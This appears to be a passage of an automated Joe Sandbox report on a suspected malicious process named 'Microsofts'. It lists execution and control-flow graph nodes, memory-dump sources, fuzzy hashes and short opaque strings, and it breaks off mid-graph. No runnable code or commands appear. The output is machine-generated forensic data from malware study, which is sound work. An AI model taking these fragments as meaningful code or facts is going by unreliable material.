                                                                                                                                                                                                                                      execution_graph 17766 245caae 17767 245cadd 17766->17767 17769 245e9bf 17767->17769 17771 245cde6 17767->17771 17772 245c168 17767->17772 17770 245c168 LdrInitializeThunk 17770->17771 17771->17769 17771->17770 17773 245c17a 17772->17773 17775 245c17f 17772->17775 17773->17771 17774 245c8a9 LdrInitializeThunk 17774->17773 17775->17773 17775->17774 17776 24546d8 17777 24546e4 17776->17777 17780 24548c9 17777->17780 17778 2454713 17781 24548e4 17780->17781 17788 2454ef8 17781->17788 17795 2454f08 17781->17795 17782 24548f0 17801 4b915f8 17782->17801 17807 4b915ea 17782->17807 17783 245491a 17783->17778 17789 2454ec4 17788->17789 17790 2454f06 17788->17790 17791 2454ff6 17790->17791 17794 245c168 LdrInitializeThunk 17790->17794 17813 245c76c 17790->17813 17819 245c158 17790->17819 17791->17782 17794->17791 17796 2454f2a 17795->17796 17797 2454ff6 17796->17797 17798 245c76c 2 API calls 17796->17798 17799 245c158 2 API calls 17796->17799 17800 245c168 LdrInitializeThunk 17796->17800 17797->17782 17798->17797 17799->17797 17800->17797 17802 4b9161a 17801->17802 17803 4b9172c 17802->17803 17804 245c76c 2 API calls 17802->17804 17805 245c158 2 API calls 17802->17805 17806 245c168 LdrInitializeThunk 17802->17806 17803->17783 17804->17803 17805->17803 17806->17803 17808 4b9161a 17807->17808 17809 4b9172c 17808->17809 17810 245c76c 2 API calls 17808->17810 17811 245c158 2 API calls 17808->17811 17812 245c168 LdrInitializeThunk 17808->17812 17809->17783 17810->17809 17811->17809 17812->17809 17818 245c623 17813->17818 17814 245c764 LdrInitializeThunk 17816 245c8c1 17814->17816 17816->17791 17817 245c168 LdrInitializeThunk 17817->17818 17818->17814 17818->17817 17820 245c17a 17819->17820 17823 245c17f 17819->17823 17820->17791 17821 245c764 LdrInitializeThunk 17821->17820 17823->17820 17823->17821 17824 245c168 LdrInitializeThunk 17823->17824 17824->17823
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                                                                                                      • API String ID: 0-2735749406
                                                                                                                                                                                                                                      • Opcode ID: 8d135ebd4a96fff95361bde1e9b504b9adafa6ab1d05d51527482f6eaa43edf3
                                                                                                                                                                                                                                      • Instruction ID: c81ddd674b869deaf847c9385a7aee360e7ac15eb0e534b06c2c86dddfa02c5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d135ebd4a96fff95361bde1e9b504b9adafa6ab1d05d51527482f6eaa43edf3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28820730A10609DFCF18DF68C984AAABBF2FF89314F1585A9E4559B2A1DB31FD41CB50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
                                                                                                                                                                                                                                      • API String ID: 0-1608600535
                                                                                                                                                                                                                                      • Opcode ID: aaf79567dd87c66e28709aa6e911306aae684a6c777c24c4bdd8946e67febbbf
                                                                                                                                                                                                                                      • Instruction ID: 85cfa52a515c04f46f0ba11d976201cad3d12e53ba75bbd9e14c72d07c916055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaf79567dd87c66e28709aa6e911306aae684a6c777c24c4bdd8946e67febbbf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A823A71A10219DFCF14DF69C894AAEBBF6FF88300F1585A9E4159B2A1DB30ED46CB50

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2281 4b91c58-4b91c80 2282 4b91c82 2281->2282 2283 4b91c87-4b91d2b 2281->2283 2282->2283 2287 4b91d39-4b91d8a 2283->2287 2288 4b91d2d-4b91d34 2283->2288 2296 4b91e5c 2287->2296 2289 4b91f94-4b91fb2 2288->2289 2297 4b91e65-4b91e73 2296->2297 2298 4b91e79-4b91e9e 2297->2298 2299 4b91d8f-4b91dbc 2297->2299 2304 4b91ea0-4b91eb5 2298->2304 2305 4b91eb6 2298->2305 2306 4b91ddd 2299->2306 2307 4b91dbe-4b91dc7 2299->2307 2304->2305 2305->2289 2311 4b91de0-4b91e01 2306->2311 2309 4b91dc9-4b91dcc 2307->2309 2310 4b91dce-4b91dd1 2307->2310 2312 4b91ddb 2309->2312 2310->2312 2315 4b91e5a-4b91e5b 2311->2315 2316 4b91e03-4b91e59 2311->2316 2312->2311 2315->2296 2316->2315
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: PH^q$PH^q
                                                                                                                                                                                                                                      • API String ID: 0-1598597984
                                                                                                                                                                                                                                      • Opcode ID: 87c63700c10f09f57b961e95dd0eab08efede9e5292292578284d032bff46aa4
                                                                                                                                                                                                                                      • Instruction ID: a1b02928579ce7a313c7025a248169b2de8dbc6e31545857c4edb6ee334702ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87c63700c10f09f57b961e95dd0eab08efede9e5292292578284d032bff46aa4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A281D074E00219CFEB18DFAAD99479DBBF2BF89300F20846AD419AB354EB346945DF50

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2537 245c168-245c178 2538 245c17f-245c18b 2537->2538 2539 245c17a 2537->2539 2542 245c192-245c1a7 2538->2542 2543 245c18d 2538->2543 2540 245c2ab-245c2b5 2539->2540 2546 245c1ad-245c1b8 2542->2546 2547 245c2bb-245c2fb call 2455d08 2542->2547 2543->2540 2550 245c2b6 2546->2550 2551 245c1be-245c1c5 2546->2551 2565 245c302-245c378 call 2455d08 call 2455c00 2547->2565 2550->2547 2552 245c1c7-245c1de 2551->2552 2553 245c1f2-245c1fd 2551->2553 2564 245c1e4-245c1e7 2552->2564 2552->2565 2558 245c1ff-245c207 2553->2558 2559 245c20a-245c214 2553->2559 2558->2559 2567 245c29e-245c2a3 2559->2567 2568 245c21a-245c224 2559->2568 2564->2550 2569 245c1ed-245c1f0 2564->2569 2597 245c3df-245c454 call 2455ca8 2565->2597 2598 245c37a-245c3b7 2565->2598 2567->2540 2568->2550 2575 245c22a-245c246 2568->2575 2569->2552 2569->2553 2580 245c248 2575->2580 2581 245c24a-245c24d 2575->2581 2580->2540 2582 245c254-245c257 2581->2582 2583 245c24f-245c252 2581->2583 2585 245c25a-245c268 2582->2585 2583->2585 2585->2550 2591 245c26a-245c271 2585->2591 2591->2540 2592 245c273-245c279 2591->2592 2592->2550 2594 245c27b-245c280 2592->2594 2594->2550 2595 245c282-245c295 2594->2595 2595->2550 2603 245c297-245c29a 2595->2603 2606 245c4f3-245c4f9 2597->2606 2600 245c3be-245c3dc 2598->2600 2601 245c3b9 2598->2601 2600->2597 2601->2600 2603->2592 2605 245c29c 2603->2605 2605->2540 2607 245c4ff-245c517 2606->2607 2608 245c459-245c46c 2606->2608 2609 245c519-245c526 2607->2609 2610 245c52b-245c53e 2607->2610 2611 245c473-245c4c4 2608->2611 2612 245c46e 2608->2612 2613 245c8c1-245c9bf 2609->2613 2614 245c545-245c561 2610->2614 2615 245c540 2610->2615 2629 245c4d7-245c4e9 2611->2629 2630 245c4c6-245c4d4 2611->2630 2612->2611 2620 245c9c7-245c9d1 2613->2620 2621 245c9c1-245c9c6 call 2455ca8 2613->2621 2617 245c563 2614->2617 2618 245c568-245c58c 2614->2618 2615->2614 2617->2618 2625 245c593-245c5c5 2618->2625 2626 245c58e 2618->2626 2621->2620 2635 245c5c7 2625->2635 2636 245c5cc-245c60e 2625->2636 2626->2625 2632 245c4f0 2629->2632 2633 245c4eb 2629->2633 2630->2607 2632->2606 2633->2632 2635->2636 2638 245c615-245c61e 2636->2638 2639 245c610 2636->2639 2640 245c846-245c84c 2638->2640 2639->2638 2641 245c623-245c648 2640->2641 2642 245c852-245c865 2640->2642 2643 245c64f-245c686 2641->2643 2644 245c64a 2641->2644 2645 245c867 2642->2645 2646 245c86c-245c887 2642->2646 2654 245c68d-245c6bf 2643->2654 2655 245c688 2643->2655 2644->2643 2645->2646 2647 245c88e-245c8a2 2646->2647 2648 245c889 2646->2648 2651 245c8a4 2647->2651 2652 245c8a9-245c8bf LdrInitializeThunk 2647->2652 2648->2647 2651->2652 2652->2613 2657 245c6c1-245c6e6 2654->2657 2658 245c723-245c736 2654->2658 2655->2654 2659 245c6ed-245c71b 2657->2659 2660 245c6e8 2657->2660 2661 245c73d-245c762 2658->2661 2662 245c738 2658->2662 2659->2658 2660->2659 2665 245c764-245c765 2661->2665 2666 245c771-245c7a9 2661->2666 2662->2661 2665->2642 2667 245c7b0-245c811 call 245c168 2666->2667 2668 245c7ab 2666->2668 2674 245c813 2667->2674 2675 245c818-245c83c 2667->2675 2668->2667 2674->2675 2678 245c843 2675->2678 2679 245c83e 2675->2679 2678->2640 2679->2678
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2957831520.0000000002450000.00000040.00000800.00020000.00000000.sdmp, Offset: 02450000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_2450000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: fd53522e652401d8b5b074a33623b518a7bf9697500c91e5e11ffca731a6d5bf
                                                                                                                                                                                                                                      • Instruction ID: 1f77be413a0850edf8e53a4ab3579f3f865769f2d346e74a2eeab4bc7bf5364c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd53522e652401d8b5b074a33623b518a7bf9697500c91e5e11ffca731a6d5bf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93224F74E00229CFCB14DFA9D984B9DBBB2BF88304F10856AE849AB355DB749985CF50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f39b0c05aa4e1ae11f9396270febe1d1114512357fe22c76ec7287c4b12a7034
                                                                                                                                                                                                                                      • Instruction ID: 152f2d2be87e4149c0729d31df815d7eedf29a9b68379a848f238ecc1ba1dedd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f39b0c05aa4e1ae11f9396270febe1d1114512357fe22c76ec7287c4b12a7034
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9827C74E012288FDB64DF69D998BDDBBB2BB89300F1081EAD40DA7265DB315E85DF40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 0e984b356b0cf24eff068c6a56a46814db9dfc05c9d3b14d77a7e5f4aa227c80
                                                                                                                                                                                                                                      • Instruction ID: 151a19067c757afb4cf86e47054299dc12f44491190d39e91b22e59b902aed62
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e984b356b0cf24eff068c6a56a46814db9dfc05c9d3b14d77a7e5f4aa227c80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DE1C274E01218CFEB14DFA5C944B9DBBB2BF89304F2081AAD408A73A5DB755E86DF11
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c5cd0b0ff5e4c2db7e87506abd95f646d588a6bdf43ab280a22fd1a9d7b712cd
                                                                                                                                                                                                                                      • Instruction ID: 6e2a7175763b79193f5b222e234db1fe74ff619e50df42db2086a2a598fab9c3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5cd0b0ff5e4c2db7e87506abd95f646d588a6bdf43ab280a22fd1a9d7b712cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2C1A274E00218CFDB14DFA5C954B9DBBB2AF89304F2084A9D409AB365DB359E86CF50
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: aa3d9eb2898215457cde15615d83d4046a8162c250c4246d9a0595f45be11713
                                                                                                                                                                                                                                      • Instruction ID: 29658b6fcc9a5d82cb55da1d1fd70fbfee89fdc1ddfbd0bad64103657d14b407
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aa3d9eb2898215457cde15615d83d4046a8162c250c4246d9a0595f45be11713
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41D2B0E002198BEB18DFAAD8547DEBBF2BF89304F14C1AAC418BB254DB355946CF14
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 712da895f0455ebfdd595e08195779562cb470b98743a0b81ff9c4acd7ddebf4
                                                                                                                                                                                                                                      • Instruction ID: c5a521a0db02d128b558333b01d1b518251d971e65f6c03843b61cc97999daac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 712da895f0455ebfdd595e08195779562cb470b98743a0b81ff9c4acd7ddebf4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD41D470E01218CBEB18DFAAD9406DEBBF2AF89300F24D17AD418AB265DB345946CF54

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 851 4b98848-4b98d36 926 4b99288-4b992bd 851->926 927 4b98d3c-4b98d4c 851->927 931 4b992c9-4b992e7 926->931 932 4b992bf-4b992c4 926->932 927->926 928 4b98d52-4b98d62 927->928 928->926 930 4b98d68-4b98d78 928->930 930->926 933 4b98d7e-4b98d8e 930->933 945 4b992e9-4b992f3 931->945 946 4b9935e-4b9936a 931->946 934 4b993ae-4b993b3 932->934 933->926 935 4b98d94-4b98da4 933->935 935->926 936 4b98daa-4b98dba 935->936 936->926 938 4b98dc0-4b98dd0 936->938 938->926 939 4b98dd6-4b98de6 938->939 939->926 941 4b98dec-4b98dfc 939->941 941->926 942 4b98e02-4b98e12 941->942 942->926 944 4b98e18-4b99287 942->944 945->946 952 4b992f5-4b99301 945->952 950 4b9936c-4b99378 946->950 951 4b99381-4b9938d 946->951 950->951 959 4b9937a-4b9937f 950->959 960 4b9938f-4b9939b 951->960 961 4b993a4-4b993a6 951->961 957 4b99303-4b9930e 952->957 958 4b99326-4b99329 952->958 957->958 971 4b99310-4b9931a 957->971 963 4b9932b-4b99337 958->963 964 4b99340-4b9934c 958->964 959->934 960->961 973 4b9939d-4b993a2 960->973 961->934 963->964 975 4b99339-4b9933e 963->975 968 4b9934e-4b99355 964->968 969 4b993b4-4b99410 964->969 968->969 970 4b99357-4b9935c 968->970 983 4b99423-4b9942e 969->983 984 4b99412-4b9941d 969->984 970->934 971->958 980 4b9931c-4b99321 971->980 973->934 975->934 980->934 990 4b994ff-4b9953b 983->990 991 4b99434-4b99491 983->991 984->983 989 4b994a6-4b994f8 984->989 989->990 1004 4b99542-4b99544 990->1004 1005 4b9953d call 4b982c0 990->1005 1000 4b9949a-4b994a3 991->1000 1006 4b99555-4b99563 1004->1006 1007 4b99546-4b99553 1004->1007 1005->1004 1014 4b99571 1006->1014 1015 4b99565-4b9956f 1006->1015 1016 4b99573-4b99576 1007->1016 1014->1016 1015->1016
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (o^q$$^q$$^q
                                                                                                                                                                                                                                      • API String ID: 0-27156697
                                                                                                                                                                                                                                      • Opcode ID: 0d7ad422151965f43fa953640f8600ef0a52f6236490de508d613bb55840a41f
                                                                                                                                                                                                                                      • Instruction ID: 58dc9cef01a2d261c9173def6ffe8701af35a2d011e41992e206aa605ed30b42
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d7ad422151965f43fa953640f8600ef0a52f6236490de508d613bb55840a41f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5727470A00218CFEF54DBA4C990B9EBBB6EF98300F1081ADD50A6B3A5DE35AD45DF51

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2141 4b965f1-4b9660d 2142 4b9660f-4b96613 2141->2142 2143 4b96615-4b96617 2141->2143 2142->2143 2144 4b9661c-4b96627 2142->2144 2145 4b96828-4b9682f 2143->2145 2146 4b9662d-4b96634 2144->2146 2147 4b96830 2144->2147 2148 4b967c9-4b967cf 2146->2148 2149 4b9663a-4b96649 2146->2149 2151 4b96835-4b9686d 2147->2151 2152 4b967d1-4b967d3 2148->2152 2153 4b967d5-4b967d9 2148->2153 2150 4b9664f-4b9665e 2149->2150 2149->2151 2159 4b96660-4b96663 2150->2159 2160 4b96673-4b96676 2150->2160 2171 4b9686f-4b96874 2151->2171 2172 4b96876-4b9687a 2151->2172 2152->2145 2154 4b967db-4b967e1 2153->2154 2155 4b96826 2153->2155 2154->2147 2157 4b967e3-4b967e6 2154->2157 2155->2145 2157->2147 2161 4b967e8-4b967fd 2157->2161 2162 4b96682-4b96688 2159->2162 2163 4b96665-4b96668 2159->2163 2160->2162 2164 4b96678-4b9667b 2160->2164 2181 4b967ff-4b96805 2161->2181 2182 4b96821-4b96824 2161->2182 2173 4b9668a-4b96690 2162->2173 2174 4b966a0-4b966bd 2162->2174 2166 4b96769-4b9676f 2163->2166 2167 4b9666e 2163->2167 2168 4b9667d 2164->2168 2169 4b966ce-4b966d4 2164->2169 2175 4b96771-4b96777 2166->2175 2176 4b96787-4b96791 2166->2176 2177 4b96794-4b967a1 2167->2177 2168->2177 2179 4b966ec-4b966fe 2169->2179 2180 4b966d6-4b966dc 2169->2180 2178 4b96880-4b96882 2171->2178 2172->2178 2183 4b96692 2173->2183 2184 4b96694-4b9669e 2173->2184 2213 4b966c6-4b966c9 2174->2213 2185 4b96779 2175->2185 2186 4b9677b-4b96785 2175->2186 2176->2177 2202 4b967a3-4b967a7 2177->2202 2203 4b967b5-4b967b7 2177->2203 2192 4b96884-4b96896 2178->2192 2193 4b96897-4b9689e 2178->2193 2206 4b9670e-4b96731 2179->2206 2207 4b96700-4b9670c 2179->2207 2188 4b966de 2180->2188 2189 4b966e0-4b966ea 2180->2189 2190 4b96817-4b9681a 2181->2190 2191 4b96807-4b96815 2181->2191 2182->2145 2183->2174 2184->2174 2185->2176 2186->2176 2188->2179 2189->2179 2190->2147 2197 4b9681c-4b9681f 2190->2197 2191->2147 2191->2190 2197->2181 2197->2182 2202->2203 2208 4b967a9-4b967ad 2202->2208 2209 4b967bb-4b967be 2203->2209 2206->2147 2217 4b96737-4b9673a 2206->2217 2215 4b96759-4b96767 2207->2215 2208->2147 2214 4b967b3 2208->2214 2209->2147 2210 4b967c0-4b967c3 2209->2210 2210->2148 2210->2149 2213->2177 2214->2209 2215->2177 2217->2147 2219 4b96740-4b96752 2217->2219 2219->2215
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: ,bq$,bq
                                                                                                                                                                                                                                      • API String ID: 0-2699258169
                                                                                                                                                                                                                                      • Opcode ID: e4143b651bd756b581c791c6bcb169c5c6b7af3d7ec29c98d6a3a2ddc734862b
                                                                                                                                                                                                                                      • Instruction ID: f470c798549fdda57fc7936153f17e8b96d2ea5bb11e6d3a76192e2f0e6a7265
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4143b651bd756b581c791c6bcb169c5c6b7af3d7ec29c98d6a3a2ddc734862b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E0814975B001058FCF14CF69C888AAABBF2FF89344B1585BAD8159B3A5DA35FC41CB91

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2221 4b92508-4b92527 2222 4b9252d-4b92536 2221->2222 2223 4b926e2-4b92707 2221->2223 2226 4b9253c-4b92591 2222->2226 2227 4b9270e-4b927a8 call 4b92270 2222->2227 2223->2227 2236 4b925bb-4b925c4 2226->2236 2237 4b92593-4b925b8 2226->2237 2267 4b927ad-4b927b2 2227->2267 2239 4b925c9-4b925d9 2236->2239 2240 4b925c6 2236->2240 2237->2236 2278 4b925db call 4b926e9 2239->2278 2279 4b925db call 4b924f8 2239->2279 2280 4b925db call 4b92508 2239->2280 2240->2239 2242 4b925e1-4b925e3 2244 4b9263d-4b9268a 2242->2244 2245 4b925e5-4b925ea 2242->2245 2258 4b92691-4b92696 2244->2258 2247 4b925ec-4b92621 2245->2247 2248 4b92623-4b92636 2245->2248 2247->2258 2248->2244 2260 4b92698 2258->2260 2261 4b926a0-4b926a5 2258->2261 2260->2261 2264 4b926af-4b926b4 2261->2264 2265 4b926a7 2261->2265 2268 4b926c9-4b926ca 2264->2268 2269 4b926b6-4b926c4 call 4b920e4 call 4b920fc 2264->2269 2265->2264 2268->2223 2269->2268 2278->2242 2279->2242 2280->2242
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.2986606833.0000000004B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B90000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_4b90000_Microsofts.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: (&^q$(bq
                                                                                                                                                                                                                                      • API String ID: 0-1294341849
                                                                                                                                                                                                                                      • Opcode ID: 4418264129bd4447040c9e5a62130a478a48c4ce0f8329c5cbbb8f697a0c8c83
                                                                                                                                                                                                                                      • Instruction ID: b276cc92e79658e07a032bd992905bec0df1eab4a919022a2e2989dcbe161c84
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4418264129bd4447040c9e5a62130a478a48c4ce0f8329c5cbbb8f697a0c8c83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D715E31F002199BDF19EFA9D8506AE7BF6AF85700F148569E405AB380DF30AD46CB95

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2321 4b96130-4b96162 2322 4b96178-4b96183 2321->2322 2323 4b96164-4b96168 2321->2323 2326 4b96189-4b9618b 2322->2326 2327 4b9622b-4b96257 2322->2327 2324 4b9616a-4b96176 2323->2324 2325 4b96190-4b96197 2323->2325 2324->2322 2324->2325 2329 4b96199-4b961a0 2325->2329 2330 4b961b7-4b961c0 2325->2330 2328 4b96223-4b96228 2326->2328 2333 4b9625e-4b962b6 2327->2333 2329->2330 2332 4b961a2-4b961ad 2329->2332 2430 4b961c2 call 4b962a8 2330->2430 2431 4b961c2 call 4b96130 2330->2431 2332->2333 2334 4b961b3-4b961b5 2332->2334 2354 4b962b8-4b962be 2333->2354 2355 4b962c5-4b962d6 call 4b92a50 2333->2355 2334->2328 2335 4b961c8-4b961ca 2336 4b961cc-4b961d0 2335->2336 2337 4b961d2-4b961da 2335->2337 2336->2337 2339 4b961ed-4b961fe 2336->2339 2340 4b961e9-4b961eb 2337->2340 2341 4b961dc-4b961e1 2337->2341 2433 4b96201 call 4b96998 2339->2433 2434 4b96201 call 4b96988 2339->2434 2435 4b96201 call 4b96a11 2339->2435 2340->2328 2341->2340 2344 4b96207-4b9620c 2347 4b9620e-4b96217 2344->2347 2348 4b96221 2344->2348 2427 4b96219 call 4b98838 2347->2427 2428 4b96219 call 4b98848 2347->2428 2429 4b96219 call 4b9947d 2347->2429 2348->2328 2350 4b9621f 2350->2328 2354->2355 2358 4b9636a-4b9636c 2355->2358 2359 4b962dc-4b962e0 2355->2359 2425 4b9636e call 4b962a8 2358->2425 2426 4b9636e call 4b96130 2358->2426 2360 4b962f0-4b962fd 2359->2360 2361 4b962e2-4b962ee 2359->2361 2367 4b962ff-4b96309 2360->2367 2361->2367 2362 4b96374-4b9637a 2364 4b9637c-4b96382 2362->2364 2365 4b96386-4b9638d 2362->2365 2368 4b963e8-4b96447 2364->2368 2369 4b96384 2364->2369 2372 4b9630b-4b9631a 2367->2372 2373 4b96336-4b9633a 2367->2373 2383 4b9644e-4b9647e 2368->2383 2369->2365 2381 4b9632a-4b96334 2372->2381 2382 4b9631c-4b96323 2372->2382 2375 4b9633c-4b96342 2373->2375 2376 4b96346-4b9634a 2373->2376 2379 4b96390-4b963e1 2375->2379 2380 4b96344 2375->2380 2376->2365 2378 4b9634c-4b96350 2376->2378 2378->2383 2384 4b96356-4b96368 2378->2384 2379->2368 2380->2365 2381->2373 2382->2381 2396 4b96480-4b9648d 2383->2396 2397 4b964a3-4b964b0 2383->2397 2384->2365 2404 4b9649f-4b964a1 2396->2404 2405 4b9648f-4b9649d 2396->2405 2403 4b964b2-4b964bc 2397->2403 2411 4b964be-4b964cc 2403->2411 2412 4b964e4-4b964e6 call 4b965f1 2403->2412 2404->2403 2405->2403 2418 4b964d9-4b964e2 2411->2418 2419 